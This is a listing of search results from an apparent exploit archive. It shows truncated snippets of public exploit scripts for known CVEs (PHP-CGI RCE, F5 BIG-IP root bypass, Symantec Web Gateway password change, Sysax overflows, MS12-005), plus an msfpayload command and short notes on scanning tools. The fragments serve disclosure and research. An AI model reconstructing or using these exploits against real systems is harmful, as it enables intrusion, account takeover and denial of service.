1325 matches found
[Http-enum] Automated HTTP Enumeration Tool
The Null Security Team is writing a Python script for automated HTTP enumeration. It is currently only in the initial beta stage, but includes basic checking of files including the Apache server-status as well as IIS WebDAV and Microsoft FrontPage Extensions; many more features will be added to this tool...
SAP NetWeaver Message Server - Multiple Vulnerabilities
SAP NetWeaver Message Server - Multiple Vulnerabilities 1. Advisory Information Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date...
[Knock] Subdomain Scanner
Knock is a Python script, written by Gianni 'guelfoweb' Amato, designed to enumerate subdomains on a target domain through a wordlist. For more information I have posted a documentation page. If you want to see how it works, you can see this sample output: Simple Scan Zone Transfer Scan Wildcard...
PHP-CGI Argument Injection Remote Code Execution
!/usr/bin/python import requests import sys print """ CVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution This exploit abuses an arguement injection in the PHP-CGI wrapper to execute code as the PHP user/webserver user. Feel free to give me abuse about this " sys.exit0 target =...
Broadcom DoS on BCM4325 and BCM4329 Devices
Exploit for hardware platform in category dos / poc Exploit Author: CoreLabs Core Security Technologies was discovered by the Argentine researcher Andrés Blanco, Vendor Homepage: Software Link: download link if available Version: 1.0 Tested on: Apple iPhone 3GS Apple iPod 2G HTC Touch Pro 2 HT...
ActFax Server 4.31 Build 0225 - Local Privilege Escalation
!/usr/bin/python Title: ActFax 4.31 Local Privilege Escalation Exploit Author: Craig Freyman @cd1zz Discovered: July 10, 2012 Vendor Notified: June 12, 2012 Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html msfpayload windows/exec CMD=cmd.exe R | msfencode -e...
Symantec Web Gateway 5.0.3.18 Password Change
!/usr/bin/python import urllib import urllib2 import re import sys print " " print " Symantec Web Gateway " exit0 ip = sys.argv1 username = sys.argv2 password = sys.argv3 url = "https://%s/spywall/temppassword.php" % ip opts = 'target':'executivesummary.php', 'USERNAME':username,...
Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
Exploit for linux platform in category web applications !/usr/bin/python import urllib import urllib2 import re import sys print " " print " Symantec Web Gateway " exit0 ip = sys.argv1 username = sys.argv2 password = sys.argv3 url = "https://%s/spywall/temppassword.php" % ip opts =...
HP Data Protector Client 6.11 / 6.20 Remote Code Execution
!/usr/bin/env python Exploit Title: HP Data Protector Client EXECCMD Remote Code Execution Vulnerability Date: 2012-12-06 Exploit Author: Ben Turner Vendor Homepage: www.hp.com Version: 6.11 & 6.20 Tested on: Windows 2003 Server SP2 en CVE: CVE-2011-0922 Notes: ZDI-11-056 Reference:...
F5 BIG-IP - Authentication Bypass
F5 BIG-IP - Authentication Bypass !/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file"priv.key", "w"...
F5 BIG-IP - Authentication Bypass
!/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file"priv.key", "w" filewrite.write"""-----BEGIN RSA PRIVATE KEY-----...
F5 BIG-IP Remote Root Authentication Bypass
!/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file"priv.key", "w" filewrite.write"""-----BEGIN RSA PRIVATE KEY-----...
Heap spraying Adobe Illustrator
Due to the recent patched vulnerabilities in Adobe Illustrator CVE-2012-2023, CVE-2012-2024, CVE-2012-2025, and CVE-2012-2026 it becomes interesting to analyze the exploitability facts of the .ai file format. Early versions of the AI file format are true EPS files with a restricted, compact synta...
HT Editor Spawning Root Shell
Exploit for linux platform in category remote exploits !/usr/bin/python Exploit Title: HT Editor Spawning Root Shell Date: 29-Mar-2012 Author: blusp10it Version: 2.0.18 Download: http://sourceforge.net/projects/hte/files/ht-source/ht-2.0.18.tar.gz Tested on: BackTrack 4 R2, Ubuntu 10.04 Run with:...
Sysax Multi Server 5.53 - SFTP (Authenticated) (SEH)
!/usr/bin/python Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit Egghunter Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit Software Versions Tested: 5.53 Date Discovered: February 22, 2012 Vendor Contacted: February 23, 2012 Vendor Response: February 27, 2012 Vendor Fix: Version 5.55...
DPScan : Drupal Security Scanner Released
The first security scanner for Drupal CMS has been released by Ali Elouafiq, on his blog. His team developed a tool that will enumerate at least the modules used by Drupal so we can simulate a white-box audit on our private machines. This small tool is publ...
Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution (Egghunter)
Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution Egghunter !/usr/bin/python Title: Sysax Multi Server " sys.exit1 target = sys.argv1 port = intsys.argv2 user = sys.argv3 password = sys.argv4 opersys = sys.argv5 base64 encode the provided creds creds =...
Microsoft Windows - Assembly Execution (MS12-005)
Microsoft Windows - Assembly Execution MS12-005 Exploit Title: MS12-005 : Microsoft Windows Assembly Execution Vulnerability Date: 1/14/2012 Author: Byoungyoung Lee, http://exploitshop.wordpress.com Version: Windows 7 32bit, fully patched until Jan 2012 Tested on: Windows 7 32bit CVE :...
Microsoft Windows - Assembly Execution (MS12-005)
Exploit Title: MS12-005 : Microsoft Windows Assembly Execution Vulnerability Date: 1/14/2012 Author: Byoungyoung Lee, http://exploitshop.wordpress.com Version: Windows 7 32bit, fully patched until Jan 2012 Tested on: Windows 7 32bit CVE : CVE-2012-0013 PoC:...
PHP Hash Table Collision - Denial of Service (PoC)
!/usr/bin/env python """ This script was written by Christian Mehlmauer https://twitter.com/!/FireFart Sourcecode online at: https://github.com/FireFart/HashCollision-DOS-POC Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision...